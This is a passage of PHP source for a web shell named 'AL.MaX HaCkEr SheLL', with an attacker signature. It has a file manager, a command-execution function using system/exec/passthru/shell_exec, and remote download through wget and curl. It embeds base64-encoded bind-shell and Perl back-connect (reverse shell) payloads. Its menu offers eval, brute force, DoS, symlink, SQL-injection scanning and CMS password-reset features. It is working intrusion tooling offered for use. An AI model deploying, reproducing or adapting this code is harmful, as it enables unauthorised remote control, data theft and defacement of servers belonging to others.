  812. <a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAgZJREFUOE9jYKAF4I7ez6CVfVQvpOOiGcnm8yUdYVRvuWalvvjNTemqi01cUfuJN4Mv/QSjRsdNG81VH6/Lb/vzT6juWhtP/CFGokwQyD3DqNpxy1Zj5YdrCjv+/Zfb+uefSNPNNt6044QNECy5wKjUesNadcHr63Jrv/2XAWL5NV//W819sk9/6sMcMJ4GwXpTHiboTLpvpzXhnoxx/x0WBsHKywzyjdfNlKY9uSU1781/SSQsMef1f4nZr1DxrJcvJWe+XC45/XmIQv8DfgbBqqvScl1374r1Pfwv2gvDD4BsGIaIgeTF+h/9F5vw+I3YxMfrxCY+iQLyBRlEaq+JSjTdWCfRfPOPUMON/zAsDGSLNt38L4aGRZtvvhFrvrVOtOV2FBALMgjVXGMUb7qpIdNxZ51U193fIu13/4OwKBDrdj74bDbzwRNkbDrj/mXj6fdnGk6976/Xd58fHEPA0GaS7LirLdf3YI10/8NfolDviLU8WAQ01E66664tHHffNZftuasq33NPWLXjPgs8ikU77jFL9T3UkZ38ZI3U1Ge/xKc8+wf0Z5tI5z1GoIvQMQNQjEG07S5qEhHve8QsNfmpjvSM52ukZ736JT7pRRvQIMLpANkYoAZm6ZkvtDVmvVktWPK6SmL6K9IMABkmM/slk+qMN7Iy/W/kxKe/ISolk60IAJfcKhfb3kZPAAAAAElFTkSuQmCC' /> $folder</a></td>
  813. <td>-</td>
  814. <td style=\"text-align:center;\">".$owner."</td>
  815. <td><center>".get_perms($parent)."</center></td>
  816. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  817. <td><span id=\"titik2\">
  818. <a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a>
  819. | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
  820. </span>
  821. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  822. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  823. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  824. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  825. </form>
  826. </td>
  827. </tr>";
  828. }
  829. else
  830. {
  831. if(!$win && $posix)
  832. {
  833. $name=@posix_getpwuid(@fileowner($folder));
  834. $group=@posix_getgrgid(@filegroup($folder));
  835. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  836. }
  837. else { $owner = $user; }
  838. $buff .= "<tr>
  839. <td>
  840. <a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAALGPC/xhBQAAAAlwSFlzAAAOwgAADsIBFShKgAAAABp0RVh0U29mdHdhcmUAUGFpbnQuTkVUIHYzLjUuMTAw9HKhAAACkUlEQVQ4T8WT2UvUURzFz2NRT5pab9ZDYZNMLjNq6rg1Fqhl5cw8qA+2kJmBgxKUhVpW4y6FZblkaRROpkQLITKG1ERhC5JMuaVmzuQWBD3e27nN0D/QQz/48P1+7znne+/LD/jvn14XtUYXqU+O0kebY2NiLfFxBkuiIcmSnJRiMe5MtexK3W02phjNSYnJZkN8gikmeoeJGRMzRr1OvxZbQzTBZCBUE+oJD4vwcJEnNibOY4hL8HCRJzEh6U/PMzc1d/j2CPc2TaibmSFNiGYT7hT7nbyU579y4dA6WXUsQNacCJR1RYGyoThINpZs8LFe1luD/mi2/ABZedBf2vL8fnSV+JdhohZPJ+sgv16H9NyGXOyGXH4AudLLetfLSh8rZ6Upj/JOMTNRAwfGa9A3Wetb0OlbQPPSffZdXpbZ/11Aj1qgMuPVeIYxG7rGbZAzTZDzHZDfeeOindxjf5M3tkMuMLTEswVqyjNzleEqSGZ74KrEZVcFn1QPMcfN7g4IPlPMN0N8a/IyR9xthJryTDVAuM5Bus6jBaPlKB85xW0XIaYb+bxrkLNXIL5UQxJVxRRfOM0LZnmz8iivyoyWwYaRUhS8LYL4WArxuRJiooq1AuLTGR9nOZd5z5Q2Ro/yqszIaVgxbEXmy8OQbwoh3pdAvrNCvD4KMXwccriAVVFIPR/iQzGhR3lfMMOsCY4chPVb8JPIwVzI5zmQA2aI/
  841. izO7AezOVNzZEMM5VGnR3nJL0cuInErHcH2DHTb0+DszcSrh1lwPjb7sMD5hKj5kQlOpfXRY0+HszsDPZ0Z2IjcMKyuTsXm5jRob+yBtnUftG0HSBa07QqTt7bu92ote6FtToeWmS1HdFj1zz/zb9ZqmlZ866Y6AAAAAElFTkSuQmCC' /> [ $folder ]</a>
  842. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  843. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  844. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  845. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  846. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  847. onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  848. </form>
  849. </td>
  850. <td>DIR</td>
  851. <td style=\"text-align:center;\">".$owner."</td>
  852. <td><center>
  853. <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  854. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  855. <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  856. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  857. <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  858. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  859. onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
  860. </form>
  861. </center></td>
  862. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
  863. <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
  864. | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
  865. </td>
  866. </tr>";
  867. }
  868. }
  869. foreach($fname as $file)
  870. {
  871. $full = $pwd.$file;
  872. if(!$win && $posix)
  873. {
  874. $name=@posix_getpwuid(@fileowner($file));
  875. $group=@posix_getgrgid(@filegroup($file));
  876. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  877. }
  878. else { $owner = $user; }
  879. $buff .= "<tr>
  880. <td>
  881. <a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAXVJREFUOE+NkjtPwlAYhv0DLEZJSDQawQCTcYD/YWIkzqx0cHT1D7C4nMRFSdOWi4uzm9FFXcRBI3KxQGlLoYCAILyekhiRw6UneZKmeb8n79eepaW/43e5XFGfz0csvF4v8Xi2yfrGJllecRIa2xnLMo+OcDis6kYNulEfUdEMZD/KuH1IQ7y6RiQS0eZJAolkig6U/pHJy0i/vOPm/gnlikYl3ExJMJm6hFxWGQpFhUqyKJQqyNFGHMfptMnu5A5UkBrVZqkiLyt4zcrI5It4y8nY2w9ZkrVxSdBaoVozZ6LqtVGDu8dnHB2fgA4HGYHZaGE2TRj1BoqKhlNyxgriiSRan+2FmM0WYrzACiQq6HS7C2l3uhDjiSkC+vKr17OFNE0gSnH0+9+2sLLMRxRECYPBwBaCOEXACyKGw6EteEFiGgTOYzzsnguapSsExu+B4yB0qJYUlf5rcy5WxsrSYcfkdfavOp3RLbebzMPK0EH/7/APv59j7X+gJNIAAAAASUVORK5CYII%3D' /> $file</a>
  882. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  883. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  884. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  885. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  886. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  887. onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  888. </form>
  889. </td>
  890. <td>".ukuran($full)."</td>
  891. <td style=\"text-align:center;\">".$owner."</td>
  892. <td><center>
  893. <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  894. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  895. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  896. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  897. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  898. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  899. onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
  900. </form></center></td>
  901. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  902. <td>
  903. <a href=\"?y=$pwd&amp;edit=$full\">edit</a>
  904. | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
  905. | <a href=\"?y=$pwd&amp;delete=$full\">delete</a>
  906. | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
  907. </td>
  908. </tr>";
  909. }
  910. $buff .= "</table>"; return $buff;
  911. }
  912.  
  913. function ukuran($file)
  914. {
  915. if($size = @filesize($file))
  916. {
  917. if($size <= 1024) return $size;
  918. else
  919. {
  920. if($size <= 1024*1024)
  921. { $size = @round($size / 1024,2);; return "$size kb"; }
  922. else { $size = @round($size / 1024 / 1024,2); return "$size mb"; }
  923. }
  924. }
  925. else return "???";
  926. }
  927.  
  928. function exe($cmd)
  929. {
  930. if(function_exists('system'))
  931. {
  932. @ob_start();
  933. @system($cmd);
  934. $buff = @ob_get_contents();
  935. @ob_end_clean();
  936. return $buff;
  937. }
  938. elseif(function_exists('exec'))
  939. {
  940. @exec($cmd,$results);
  941. $buff = "";
  942. foreach($results as $result)
  943. { $buff .= $result; }
  944. return $buff;
  945. }
  946. elseif(function_exists('passthru'))
  947. {
  948. @ob_start();
  949. @passthru($cmd);
  950. $buff = @ob_get_contents();
  951. @ob_end_clean();
  952. return $buff;
  953. }
  954. elseif(function_exists('shell_exec'))
  955. {
  956. $buff = @shell_exec($cmd);
  957. return $buff;
  958. }
  959. }
  960.  
  961. function tulis($file,$text)
  962. {
  963. $textz = gzinflate(base64_decode($text));
  964. if($filez = @fopen($file,"w"))
  965. {
  966. @fputs($filez,$textz);
  967. @fclose($file);
  968. }
  969. }
  970.  
  971. function tulis_2($file,$text)
  972. {
  973. $textz = base64_decode($text);
  974. if($filez = @fopen($file,"w"))
  975. {
  976. @fputs($filez,$textz);
  977. @fclose($file);
  978. }
  979. }
  980.  
  981. function ambil($link,$file)
  982. {
  983. if($fp = @fopen($link,"r"))
  984. {
  985. while(!feof($fp))
  986. {
  987. $cont.= @fread($fp,1024);
  988. }
  989. @fclose($fp);
  990. $fp2 = @fopen($file,"w");
  991. @fwrite($fp2,$cont);
  992. @fclose($fp2);
  993. }
  994. }
  995.  
  996. function which($pr)
  997. {
  998. $path = exe("which $pr");
  999. if(!empty($path))
  1000. { return trim($path); }
  1001. else { return trim($pr); }
  1002. }
  1003.  
  1004. function download($cmd,$url)
  1005. {
  1006. $namafile = basename($url);
  1007. switch($cmd)
  1008. {
  1009. case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break;
  1010. case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break;
  1011. case 'wfread' : ambil($wurl,$namafile);break;
  1012. case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  1013. case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  1014. case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  1015. case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  1016. default: break; }
  1017. return $namafile;
  1018. }
  1019.  
  1020. function get_perms($file)
  1021. {
  1022. if($mode=@fileperms($file))
  1023. {
  1024. $perms='';
  1025. $perms .= ($mode & 00400) ? 'r' : '-';
  1026. $perms .= ($mode & 00200) ? 'w' : '-';
  1027. $perms .= ($mode & 00100) ? 'x' : '-';
  1028. $perms .= ($mode & 00040) ? 'r' : '-';
  1029. $perms .= ($mode & 00020) ? 'w' : '-';
  1030. $perms .= ($mode & 00010) ? 'x' : '-';
  1031. $perms .= ($mode & 00004) ? 'r' : '-';
  1032. $perms .= ($mode & 00002) ? 'w' : '-';
  1033. $perms .= ($mode & 00001) ? 'x' : '-';
  1034. return $perms;
  1035. }
  1036. else return "??????????";
  1037. }
  1038.  
  1039. function clearspace($text){ return str_replace(" ","_",$text); }
  1040.  
  1041. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  1042. $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  1043.  
  1044. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
  1045. jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  1046. ?>
  1047.  
  1048. <html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
  1049. <head>
  1050. <link rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAMIOAADCDgAAAAAAAAAAAAAMDg7/FBMS/xgWFf8UFBT/FxcY/x8dHv8aGRn/GhgY/xoZGP8RFBT/DRAR/xMTEv8WFBP/FRQU/w0NDv8SERH/EBER/xYVFP8bGBf/GhgX/xoZGP8fHh3/FhcY/xYXF/8bGhn/ERMT/xESEv8TEhH/Hxwb/yMhIP8MCwv/EhER/xMTFP8ZGBj/GxkY/xgYF/8bGxn/HBoY/xIUFP8NERP/FBYX/xATEf8UFRP/ExMR/yooJv8kJCP/EREQ/w8ODf8VFBT/GxkY/xwaGf8YGBb/FxgW/xcYE/8RExD/DA8L/xATAf8TFQ3/EREN/xEQDf83NTL/Li0s/w0ODv8MDAz/FRUU/xUVFf8aGRj/HBsZ/xsbF/8WGRT/ExcJ/wwOEf8PDW7/BAYK/xESCf9RUEz/U1JQ/x8eHf8NDAz/Dg8P/xMUFP8QEhP/FxgY/xsbGP8aGxf/HB0S/xITBP8wLIH/enXa/2dpaf97e3D/ZGVi/xwdGv8MDAr/EREQ/xEREf8WFxf/Gxsa/xkaGf8bGxj/HBwW/xcZC/8eHWP/j4rc/z08P/8hIQb/ExUF/wQGAP8AAAD/ERAN/xERD/8REhH/FRYW/xoaGv8ZGhn/GBkX/xocFf8KDAH/VlGw/3h1zP8AAAH/AAQA/wwNLf8OC1f/RkY6/w4PDP8RERD/EhIR/xETE/8UFhb/ERIR/xESEP8bHBT/AwYD/1ZTlP+IhNf/AAAD/wAAZP8AABT/uLX//4SEeP8AAAD/FRUT/xEREf8TFBT/FhYW/zM0M/8lJiT/BAYC/wIEAP8NDSH/wcDN/0lFrv9QS+r/v7zz/8/O2/8BAwD/DQ4K/xISEf8QERD/DxER/wYICP8JDQ7/RkZF/
  1051. 1VVUv8xMir/AAAA/1VWUf//////qqnQ/2Zoaf8GCAv/AgYA/xESD/8UFBP/ExMT/xobG/85Ozv/PD4+/zQ1Nf9SUlH/f357/6Sknv+Hh3//AAAO/wAAHv8AAwD/Cw0E/w8RDf8QEhD/FRUV/xYVFf8MDw//FxYW/yspKP84OTn/SUpJ/2VkYv/Ozcr/r66i/wAAJv8VFzX/Cw4B/xUVEv8ZFxT/FBQT/xMVFf8XFxf/DhAR/yclJf85Njb/RkZF/2BgYf9/fX3/ZGRi/xsaE/8TEiL/ExQ5/wwQB/8YFxT/GxgW/xYVFP8TExT/FxYX/xAREf8eHRz/KCUk/yUjIv8aGhn/DQ0M/wAAAP8JCwr/FxcV/xATFf8TFRL/GhkW/xwZF/8YFxb/FBMT/xQUE/8RERH/ExIS/xEPDv8MDQz/EhEQ/xUVE/8PERP/Cg0Q/xIUFP8RFBL/FhYV/xwaGf8aFxb/ExMT/xISEv8QDw//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D%3D" type="image/x-icon" />
  1052. <title>Private ! .. AL.MaX HaCkEr SheLL</title>
  1053. <script type="text/javascript">
  1054.  
  1055. function tukar(lama,baru)
  1056. {
  1057. document.getElementById(lama).style.display = 'none';
  1058. document.getElementById(baru).style.display = 'block';
  1059. }
  1060.  
  1061. </script>
  1062. <style type="text/css">
  1063. AKUSTYLE { display:none; }
  1064. body { background:#000000; }
  1065. A:link {COLOR: #FF5A00; TEXT-DECORATION: none }
  1066. A:visited {COLOR: #FC5000; TEXT-DECORATION: none }
  1067. A:hover {text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan; color: #FF6600; TEXT-DECORATION: none }
  1068. A:active {color: Red; TEXT-DECORATION: none }
  1069. textarea {BORDER-RIGHT: #3e3e3e 1px solid; BORDER-TOP: #3e3e3e 1px solid; BORDER-LEFT: #3e3e3e 1px solid; BORDER-BOTTOM: #3e3e3e 1px solid; BACKGROUND-COLOR: #1b1b1b; font: Fixedsys bold; color: #aaa; }
  1070. * { font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
  1071. #menu { background:#040404; margin:2px 2px 2px 2px; }
  1072. #menu a { padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
  1073. #menu a:hover { background:#000000; border-bottom:1px solid #000000; border-top:1px solid #000000; }
  1074. .tabnet { margin:15px auto 0 auto; border: 1px solid #000000; }
  1075. .main { width:100%; }
  1076. .gaya { color: #FF5E00; }
  1077. .your_ip { color: #FF5E00; }
  1078. .inputz { background:#000000; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
  1079. .inputzbut { background:#111111; color:#060606; margin:0 4px; border:1px solid #000000; }
  1080. .inputz:hover,
  1081. .inputzbut:hover { border-bottom:1px solid #FF4D00; border-top:1px solid #FF4400; color:#FF4400; }
  1082. .output { margin:auto; border:1px solid #FF0000; width:100%; height:400px; background:#000000; padding:0 2px; }
  1083. .cmdbox { width:100%; }
  1084. .head_info { padding: 0 4px; }
  1085. .b1 { font-size:30px; padding:0; color:#FF5100; }
  1086. .b2 { font-size:30px; padding:0; color: #FF5500; }
  1087. .b_tbl { text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
  1088. .phpinfo table { width:100%; padding:0 0 0 0; }
  1089. .phpinfo td { background:#111111; color:#FF5500; padding:6px 8px;; }
  1090. .phpinfo th, th { background:#444444; border-bottom:1px solid #000000; font-weight:normal; }
  1091. .phpinfo h2,
  1092. .phpinfo h2 a { text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#444444; padding:4px 0; }
  1093. .explore { width:100%; }
  1094. .explore a { text-decoration:none; }
  1095. .explore td { border-bottom:1px solid #444444; padding:0 8px; line-height:24px; }
  1096. .explore th { padding:3px 8px; font-weight:normal; }
  1097. .explore th:hover,
  1098. .phpinfo th:hover { border-bottom:1px solid #FF4400; }
  1099. .explore tr:hover { background:#050505; }
  1100. .viewfile { background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; }
  1101. .sembunyi { display:none; padding:0;margin:0; }
  1102. .style1 {
  1103. text-align: center;
  1104. }
  1105. </style>
  1106. </head>
  1107. <body onLoad="document.getElementById('cmd').focus();">
  1108. </div>
  1109. <div class="style39">
  1110. <!-- head info start here -->
  1111. <div class="head_info">
  1112. <table>
  1113. <tr>
  1114. <td>
  1115. <table class="b_tbl">
  1116. <tr>
  1117. <td class="style43">
  1118. <img class="decoded" alt="http://oi50.tinypic.com/117hic1.jpg" src="http://oi50.tinypic.com/117hic1.jpg" width="165" height="165"><br>
  1119. <span <ul>
  1120.  
  1121. <span style="font-family: trebuchet ms,helvetica,sans-serif;">
  1122. <font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);">
  1123. <span class="style6">
  1124. <span class="style8"> <strong class="style33">AttaCker</strong></span><span class="style4"><strong>
  1125. </strong> </span>
  1126.  
  1127. <span class="style9"> <strong class="style33">From</strong></span><span class="style4">
  1128. </span></span>
  1129. </font></span></span><strong>
  1130. <font style="text-shadow: 2px 2px 3px rgb(0, 0, 0);">
  1131.  
  1132. <span style="font-family: trebuchet ms,helvetica,sans-serif;">
  1133. <span <ul class="style33">
  1134.  
  1135. SuDaN</span></span></font></strong><span class="style4"><span class="style6"><font class="hk" style="text-shadow: 2px 2px 3px rgb(0, 0, 0);"><span <ul style="font-family: 'trebuchet ms', helvetica, sans-serif"><strong><br>
  1136. <font size="6"><span lang="en-us" class="style49">
  1137. <span class="style31">
  1138. <a href="mailto:pv0@HoTmaiL.CoM">
  1139.  
  1140. Gun</a></span></span></font></strong><font size="6"><span lang="en-us" class="style49"><font color="#FF0000"><a href="mailto:gun@linuxmail.org"><span class="style32"><strong class="style31">@</strong></span></a></font><a href="mailto:Gun@linuxmail.org"><strong class="style31">Linuxmail.org</strong></a></span></font></span></font></span></span></td>
  1141. </tr>
  1142. </table>
  1143. </td>
  1144. <td class="style38">
  1145. <?php echo $buff; ?>
  1146. </td>
  1147. </tr>
  1148. </table>
  1149. </div>
  1150. <!-- head info end here -->
  1151. <!-- menu start -->
  1152. <div id="menu">
  1153. <center>
  1154. <a href="?<?php echo "y=".$pwd; ?>"> <b>Explore</b></a>
  1155. <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell"> <b>Shell</b></a>
  1156. <a href="?<?php echo "y=".$pwd; ?>&amp;x=php"> <b>Eval</b></a>
  1157. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql"> <b>MySQL</b></a>
  1158. <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo"> <b>PHP</b></a>
  1159. <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit"> <b>NetSploit</b></a>
  1160. <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload"> <b>Upload</b></a>
  1161. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail"> <b>Mail</b></a>
  1162. <a href="?<?php echo "y=".$pwd; ?>&amp;x=brute"> <b>BruteForce</b></a>
  1163. <a href="?<?php echo "y=".$pwd; ?>&amp;x=readable"> <b>OpenDIR</b></a>
  1164. <a href="?<?php echo "y=".$pwd; ?>&amp;x=dos"> <b>D0S</b></a><br><br>
  1165. <a href="?<?php echo "y=".$pwd; ?>&amp;x=localdomain"> <b>
  1166. LocalDomain</b></a>
  1167. <a href="?<?php echo "y=".$pwd; ?>&amp;x=zone-h"> <b>Zone-H</b></a>
  1168. <a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink"> <b>Symlink</b></a>
  1169. <a href="?<?php echo "y=".$pwd; ?>&amp;x=identify"> <b>Domain
  1170. Script</b></a>
  1171. <a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner"> <b>
  1172. SQLI Scan</b></a>
  1173. <a href="?<?php echo "y=".$pwd; ?>&amp;x=web-info"> <b>
  1174. Website Whois</b></a>
  1175. <a href="?<?php echo "y=".$pwd; ?>&amp;x=port-scanner"> <b>
  1176. Port-Scanner</b></a>
  1177. <a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset"> <b>WP
  1178. Reset</b></a><br><br>
  1179. <a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset"> <b>Jomlaa
  1180. Reset</b></a>
  1181. <a href="?<?php echo "y=".$pwd; ?>&amp;x=cms-scanner"> <b>CMS
  1182. Scanner</b></a>
  1183. <a href="?<?php echo "y=".$pwd; ?>&amp;x=vb"> <b>VB Changer</b></a>
  1184. <a href="?<?php echo "y=".$pwd; ?>&amp;x=string-encode"> <b>
  1185. String Encoder</b></a>
  1186. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysqlbackup"> <b>SQL
  1187. Backup</b></a>
